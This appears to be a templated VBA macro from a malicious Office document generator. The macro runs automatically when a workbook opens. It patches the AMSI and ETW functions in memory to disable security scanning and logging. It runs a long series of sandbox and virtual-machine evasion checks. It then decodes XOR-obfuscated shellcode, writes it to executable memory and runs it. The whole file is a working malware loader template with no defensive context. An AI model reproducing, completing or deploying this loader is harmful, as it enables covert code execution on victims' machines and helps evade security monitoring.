Attribute VB_Name = "{{ v.module_name }}"
Option Explicit

#If VBA7 Then
    Private Declare PtrSafe Function {{ v.fn_callwp }} Lib "user32" Alias "CallWindowProcA" _
        (ByVal lpPrevWndFunc As LongPtr, ByVal hWnd As LongPtr, _
         ByVal Msg As LongPtr, ByVal wParam As LongPtr, ByVal lParam As LongPtr) As LongPtr
    Private Declare PtrSafe Function {{ v.fn_loadlib }} Lib "kernel32" Alias "LoadLibraryA" (ByVal lpLibFileName As String) As LongPtr
    Private Declare PtrSafe Function {{ v.fn_getprocaddr }} Lib "kernel32" Alias "GetProcAddress" _
        (ByVal hModule As LongPtr, ByVal lpProcName As String) As LongPtr
#End If

Private {{ v.fn_valloc }} As LongPtr
Private {{ v.fn_movemem }} As LongPtr
Private {{ v.fn_vprotect }} As LongPtr

Private Function {{ v.fn_build_str }}(codes() As Integer) As String
    Dim s As String, i As Long
    For i = 0 To UBound(codes)
        s = s & Chr(codes(i))
    Next
    {{ v.fn_build_str }} = s
End Function

Private Sub {{ v.fn_amsi_patch }}()
    On Error Resume Next
    Dim amsiLib As String: amsiLib = {{ v.vba_amsi_dll }}
    Dim scanName As String: scanName = {{ v.vba_amsi_scan_buf }}
    Dim amsiBase As LongPtr: amsiBase = {{ v.fn_loadlib }}(amsiLib)
    If amsiBase = 0 Then Exit Sub
    Dim scanAddr As LongPtr: scanAddr = {{ v.fn_getprocaddr }}(amsiBase, scanName)
    If scanAddr = 0 Then Exit Sub
    Dim oldP As Long
    {{ v.fn_callwp }} {{ v.fn_vprotect }}, scanAddr, 6, &H40, VarPtr(oldP)
    Dim {{ v.var_amsi_patch }}(0 To 5) As Byte
    {{ v.var_amsi_patch }}(0) = &H{{ amsi_enc_bytes[0] }}: {{ v.var_amsi_patch }}(1) = &H{{ amsi_enc_bytes[1] }}: {{ v.var_amsi_patch }}(2) = &H{{ amsi_enc_bytes[2] }}: {{ v.var_amsi_patch }}(3) = &H{{ amsi_enc_bytes[3] }}: {{ v.var_amsi_patch }}(4) = &H{{ amsi_enc_bytes[4] }}: {{ v.var_amsi_patch }}(5) = &H{{ amsi_enc_bytes[5] }}
    Dim {{ v.var_amsi_xk }} As Byte: {{ v.var_amsi_xk }} = &H{{ amsi_xor_key }}
    Dim {{ v.var_amsi_pi }} As Long: For {{ v.var_amsi_pi }} = 0 To 5: {{ v.var_amsi_patch }}({{ v.var_amsi_pi }}) = {{ v.var_amsi_patch }}({{ v.var_amsi_pi }}) Xor {{ v.var_amsi_xk }}: Next
    {{ v.fn_callwp }} {{ v.fn_movemem }}, scanAddr, VarPtr({{ v.var_amsi_patch }}(0)), 6, 0
    {{ v.fn_callwp }} {{ v.fn_vprotect }}, scanAddr, 6, oldP, VarPtr(oldP)
End Sub

Private Sub {{ v.fn_etw_patch }}()
    On Error Resume Next
    Dim ntdllName As String: ntdllName = {{ v.vba_ntdll_dll }}
    Dim etwName As String: etwName = {{ v.vba_etw_event_write }}
    Dim ntdllBase As LongPtr: ntdllBase = {{ v.fn_loadlib }}(ntdllName)
    If ntdllBase = 0 Then Exit Sub
    Dim etwAddr As LongPtr: etwAddr = {{ v.fn_getprocaddr }}(ntdllBase, etwName)
    If etwAddr = 0 Then Exit Sub
    Dim oldP As Long
    {{ v.fn_callwp }} {{ v.fn_vprotect }}, etwAddr, 4, &H40, VarPtr(oldP)
    Dim {{ v.var_etw_patch }}(0 To 3) As Byte
    {{ v.var_etw_patch }}(0) = &H{{ etw_enc_bytes[0] }}: {{ v.var_etw_patch }}(1) = &H{{ etw_enc_bytes[1] }}: {{ v.var_etw_patch }}(2) = &H{{ etw_enc_bytes[2] }}: {{ v.var_etw_patch }}(3) = &H{{ etw_enc_bytes[3] }}
    Dim {{ v.var_etw_xk }} As Byte: {{ v.var_etw_xk }} = &H{{ etw_xor_key }}
    Dim {{ v.var_etw_pi }} As Long: For {{ v.var_etw_pi }} = 0 To 3: {{ v.var_etw_patch }}({{ v.var_etw_pi }}) = {{ v.var_etw_patch }}({{ v.var_etw_pi }}) Xor {{ v.var_etw_xk }}: Next
    {{ v.fn_callwp }} {{ v.fn_movemem }}, etwAddr, VarPtr({{ v.var_etw_patch }}(0)), 4, 0
    {{ v.fn_callwp }} {{ v.fn_vprotect }}, etwAddr, 4, oldP, VarPtr(oldP)
End Sub

Private Function {{ v.fn_hex2arr }}(hex As String) As Byte()
    Dim n As Long: n = Len(hex) \ 2
    Dim arr() As Byte: ReDim arr(0 To n - 1)
    Dim i As Long
    For i = 0 To n - 1
        arr(i) = CByte("&H" & Mid$(hex, i * 2 + 1, 2))
    Next
    {{ v.fn_hex2arr }} = arr
End Function

Private Function {{ v.fn_xor }}(data() As Byte, key() As Byte) As Byte()
    Dim n As Long: n = UBound(data)
    Dim k As Long: k = UBound(key) + 1
    Dim out() As Byte: ReDim out(0 To n)
    Dim i As Long
    For i = 0 To n
        out(i) = data(i) Xor key(i Mod k)
    Next
    {{ v.fn_xor }} = out
End Function

Private Function {{ v.fn_sandbox }}() As Boolean
    {{ v.fn_sandbox }} = False
    On Error Resume Next
    If Application.Workbooks.Count < 1 Then {{ v.fn_sandbox }} = True: Exit Function
    If Application.RecentFiles.Count < 3 Then {{ v.fn_sandbox }} = True: Exit Function
    Dim usr As String: usr = LCase(Environ("USERNAME"))
    Dim badU: badU = Split({{ v.vba_bad_users }}, Chr(124))
    Dim i As Integer
    For i = 0 To UBound(badU)
        If usr = CStr(badU(i)) Then {{ v.fn_sandbox }} = True: Exit Function
    Next
    Dim cname As String: cname = LCase(Environ("COMPUTERNAME"))
    Dim badC: badC = Split({{ v.vba_bad_computers }}, Chr(124))
    For i = 0 To UBound(badC)
        If InStr(cname, CStr(badC(i))) > 0 Then {{ v.fn_sandbox }} = True: Exit Function
    Next
    On Error Resume Next
    Dim _xi As Integer
    Dim vmCodes({{ vba_vmware_reg_len }}) As Integer
    {% for b in vba_vmware_reg_enc %}vmCodes({{ loop.index0 }})={{ b }}
    {% endfor %}For _xi = 0 To {{ vba_vmware_reg_len }}: vmCodes(_xi) = vmCodes(_xi) Xor {{ vba_vmware_reg_xk }}: Next
    Dim wshShell As Object
    Set wshShell = CreateObject({{ v.vba_wscript_shell }})
    wshShell.RegRead {{ v.fn_build_str }}(vmCodes)
    If Err.Number = 0 Then {{ v.fn_sandbox }} = True: Set wshShell = Nothing: Exit Function
    Err.Clear
    Dim vbCodes({{ vba_vbox_reg_len }}) As Integer
    {% for b in vba_vbox_reg_enc %}vbCodes({{ loop.index0 }})={{ b }}
    {% endfor %}For _xi = 0 To {{ vba_vbox_reg_len }}: vbCodes(_xi) = vbCodes(_xi) Xor {{ vba_vbox_reg_xk }}: Next
    wshShell.RegRead {{ v.fn_build_str }}(vbCodes)
    If Err.Number = 0 Then {{ v.fn_sandbox }} = True: Set wshShell = Nothing: Exit Function
    Err.Clear
    Set wshShell = Nothing
    Dim fso2 As Object
    Set fso2 = CreateObject({{ v.vba_fs_obj }})
    On Error Resume Next
    Dim drv2 As Object
    Set drv2 = fso2.GetDrive("C:")
    If Err.Number = 0 Then
        If drv2.TotalSize < 53687091200 Then {{ v.fn_sandbox }} = True: Set fso2 = Nothing: Exit Function
    End If
    On Error GoTo 0
    Set fso2 = Nothing
    Dim wmiSvc3 As Object
    On Error Resume Next
    Set wmiSvc3 = GetObject({{ v.vba_winmgmts }})
    If Err.Number = 0 Then
        Dim prtQ As Object: Set prtQ = wmiSvc3.ExecQuery({{ v.vba_wmi_printer_q }})
        Dim prtCnt As Long: prtCnt = 0
        Dim oPrt As Object
        For Each oPrt In prtQ: prtCnt = prtCnt + 1: Next
        If prtCnt = 0 Then {{ v.fn_sandbox }} = True: Set wmiSvc3 = Nothing: Exit Function
    End If
    On Error GoTo 0
    Set wmiSvc3 = Nothing
    Dim wmiProc As Object
    On Error Resume Next
    Set wmiProc = GetObject({{ v.vba_winmgmts }})
    If Err.Number = 0 Then
        Dim pQ As Object: Set pQ = wmiProc.ExecQuery({{ v.vba_wmi_proc_q }})
        Dim badProc() As String: badProc = Split({{ v.vba_vm_procs }}, "|")
        Dim oP As Object, pn As String, j As Integer
        For Each oP In pQ
            pn = LCase(oP.Name)
            For j = 0 To UBound(badProc)
                If pn = CStr(badProc(j)) Then {{ v.fn_sandbox }} = True: Set wmiProc = Nothing: Exit Function
            Next j
        Next oP
    End If
    On Error GoTo 0
    Set wmiProc = Nothing
    If Environ({{ v.vba_env_vbox }}) <> "" Then {{ v.fn_sandbox }} = True: Exit Function
    If Environ({{ v.vba_env_sandboxie }}) <> "" Then {{ v.fn_sandbox }} = True: Exit Function
End Function

Private Sub {{ v.fn_exec }}()
    If {{ v.fn_sandbox }}() Then Exit Sub
    Dim k32 As LongPtr: k32 = {{ v.fn_loadlib }}({{ v.vba_kernel32 }})
    {{ v.fn_valloc }}  = {{ v.fn_getprocaddr }}(k32, {{ v.vba_virtual_alloc }})
    {{ v.fn_movemem }} = {{ v.fn_getprocaddr }}(k32, {{ v.vba_rtl_move_mem }})
    {{ v.fn_vprotect }} = {{ v.fn_getprocaddr }}(k32, {{ v.vba_virtual_protect }})
    If {{ v.fn_valloc }} = 0 Or {{ v.fn_movemem }} = 0 Or {{ v.fn_vprotect }} = 0 Then Exit Sub
    Dim _u32 As LongPtr: _u32 = {{ v.fn_loadlib }}({{ v.vba_user32_dll }})
    Dim _fnGcp As LongPtr: _fnGcp = {{ v.fn_getprocaddr }}(_u32, {{ v.vba_get_cursor_pos }})
    If _fnGcp = 0 Then Exit Sub
    Dim _pt1(1) As Long, _pt2(1) As Long
    {{ v.fn_callwp }} _fnGcp, VarPtr(_pt1(0)), 0, 0, 0
    Dim tStart As Date: tStart = Now
    Do While DateDiff("s", tStart, Now) < 2: DoEvents: Loop
    {{ v.fn_callwp }} _fnGcp, VarPtr(_pt2(0)), 0, 0, 0
    If _pt1(0) = _pt2(0) And _pt1(1) = _pt2(1) Then Exit Sub
    Call {{ v.fn_amsi_patch }}
    Call {{ v.fn_etw_patch }}

    Dim sc_hex As String, key_hex As String
    sc_hex  = {% for chunk in shellcode_chunks %}"{{ chunk }}"{% if not loop.last %} & {% endif %}{% endfor %}
    key_hex = {% for chunk in key_chunks %}"{{ chunk }}"{% if not loop.last %} & {% endif %}{% endfor %}

    Dim _k() As Byte
    _k = {{ v.fn_hex2arr }}(key_hex)
    Dim _ki As Long
    For _ki = 0 To UBound(_k): _k(_ki) = _k(_ki) Xor {{ key_tweak }}: Next

    Dim raw() As Byte, sc() As Byte
    raw = {{ v.fn_hex2arr }}(sc_hex)
    sc  = {{ v.fn_xor }}(raw, _k)

    Dim mem As LongPtr
    mem = {{ v.fn_callwp }}({{ v.fn_valloc }}, 0, UBound(sc) + 1, &H3000, &H04)
    If mem = 0 Then Exit Sub
    {{ v.fn_callwp }} {{ v.fn_movemem }}, mem, VarPtr(sc(0)), UBound(sc) + 1, 0
    Dim oldP As Long
    {{ v.fn_callwp }} {{ v.fn_vprotect }}, mem, UBound(sc) + 1, &H20, VarPtr(oldP)

    {{ v.fn_callwp }} mem, 0, 0, 0, 0
End Sub

Public Sub Workbook_Open()
    Call {{ v.fn_exec }}
End Sub

Public Sub Auto_Open()
    Call {{ v.fn_exec }}
End Sub
